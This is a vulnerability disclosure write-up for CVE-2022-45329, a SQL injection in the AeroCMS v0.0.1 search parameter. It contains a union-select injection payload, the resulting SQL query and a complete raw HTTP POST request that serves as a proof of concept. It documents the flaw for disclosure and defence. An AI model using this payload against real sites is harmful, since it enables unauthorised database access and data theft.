Headline
CVE-2022-45329: CVE/search_sql_injection.md at master · rdyx0/CVE
AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.
Step to Reproduct
- The search parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.
Exploit
Query out the current user
Vulnerable Code
The search parameter is passed in the POST mode and brought into the mysql_query() function without filtering
SQL query statements
"SELECT * FROM posts WHERE post_tags LIKE '%a%' union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q%'"
POC
Injection Point
search=a%’ union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q
Request
POST /AeroCMS-0.0.1/search.php HTTP/1.1 Host: localhost Content-Length: 31 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/AeroCMS-0.0.1/post.php?p_id=1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=ffopa5dean7sk0fe55kc93e163 Connection: close
search=a%’ union select 1,2,user(),4,5,6,7,8,9,10,11,12-- q&submit=